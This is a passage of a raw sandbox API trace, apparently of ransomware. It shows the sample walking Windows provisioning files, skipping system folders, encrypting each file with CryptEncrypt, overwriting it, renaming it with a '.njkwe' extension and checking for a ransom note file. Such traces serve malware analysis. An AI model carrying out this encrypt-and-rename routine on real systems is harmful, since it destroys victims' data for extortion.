nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0079.626] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.626] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0079.626] GetProcessHeap () returned 0xbe0000 [0079.626] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.626] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.626] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.626] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.626] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.627] CloseHandle (hObject=0x43c) returned 1 [0079.627] GetProcessHeap () returned 0xbe0000 [0079.627] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.627] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0079.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\454__connections_cellular_vodafone tr (turkey)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\454__connections_cellular_vodafone tr (turkey)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.627] GetProcessHeap () returned 0xbe0000 [0079.627] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.627] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910704f6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910704f6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910704f6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="455__C~1.PRO")) returned 1 [0079.628] lstrcmpiW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0079.628] lstrcmpiW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0079.628] lstrcmpiW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0079.628] lstrcmpiW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0079.628] lstrcmpiW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0079.628] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0079.628] StrStrIW (lpFirst="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0079.628] lstrcmpW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.629] lstrcmpW (lpString1="455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0079.629] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\455__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.629] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\455__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.629] GetTickCount () returned 0x11543ac [0079.629] GetTickCount () returned 0x11543ac [0079.629] GetTickCount () returned 0x11543ac [0079.629] GetTickCount () returned 0x11543ac [0079.629] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.629] GetProcessHeap () returned 0xbe0000 [0079.629] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.629] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.630] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.630] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.632] GetProcessHeap () returned 0xbe0000 [0079.632] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.632] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.632] CloseHandle (hObject=0x43c) returned 1 [0079.633] GetProcessHeap () returned 0xbe0000 [0079.633] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.633] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0079.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\455__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\455__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\455__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.633] GetProcessHeap () returned 0xbe0000 [0079.633] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.633] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910704f6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910704f6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910704f6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", cAlternateFileName="456__C~1.PRO")) returned 1 [0079.633] lstrcmpiW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.634] lstrcmpiW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.634] lstrcmpiW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.634] lstrcmpiW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.634] lstrcmpiW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.634] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml") returned 167 [0079.634] StrStrIW (lpFirst="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.634] lstrcmpW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.635] lstrcmpW (lpString1="456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.635] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\456__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.635] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\456__connections_cellular_vf kktc telsim (cyprus)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.635] GetTickCount () returned 0x11543ac [0079.635] GetTickCount () returned 0x11543ac [0079.635] GetTickCount () returned 0x11543ac [0079.635] GetTickCount () returned 0x11543ac [0079.635] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.635] GetProcessHeap () returned 0xbe0000 [0079.635] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.635] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0079.691] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.691] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0079.691] GetProcessHeap () returned 0xbe0000 [0079.691] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.691] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.692] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.692] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.692] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.692] CloseHandle (hObject=0x43c) returned 1 [0079.692] GetProcessHeap () returned 0xbe0000 [0079.692] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.692] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0079.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\456__connections_cellular_vf kktc telsim (cyprus)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\456__Connections_Cellular_VF KKTC Telsim (Cyprus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\456__connections_cellular_vf kktc telsim (cyprus)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.693] GetProcessHeap () returned 0xbe0000 [0079.693] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.693] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910704f6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910704f6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910704f6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="457__C~1.PRO")) returned 1 [0079.693] lstrcmpiW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0079.693] lstrcmpiW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0079.693] lstrcmpiW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0079.693] lstrcmpiW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0079.693] lstrcmpiW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0079.693] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0079.693] StrStrIW (lpFirst="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0079.693] lstrcmpW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.693] lstrcmpW (lpString1="457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0079.693] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\457__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.693] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\457__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.694] GetTickCount () returned 0x11543eb [0079.694] GetTickCount () returned 0x11543eb [0079.694] GetTickCount () returned 0x11543eb [0079.694] GetTickCount () returned 0x11543eb [0079.694] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.694] GetProcessHeap () returned 0xbe0000 [0079.694] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.694] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.695] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.695] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.695] GetProcessHeap () returned 0xbe0000 [0079.695] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.695] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.695] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.696] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.696] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.696] CloseHandle (hObject=0x43c) returned 1 [0079.696] GetProcessHeap () returned 0xbe0000 [0079.697] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.697] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0079.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\457__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\457__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\457__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.697] GetProcessHeap () returned 0xbe0000 [0079.697] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.697] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91096761, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91096761, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91096761, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", cAlternateFileName="458__C~1.PRO")) returned 1 [0079.697] lstrcmpiW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.698] lstrcmpiW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.698] lstrcmpiW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.698] lstrcmpiW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.698] lstrcmpiW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.698] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml") returned 162 [0079.698] StrStrIW (lpFirst="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.698] lstrcmpW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.698] lstrcmpW (lpString1="458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.698] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\458__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.698] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: 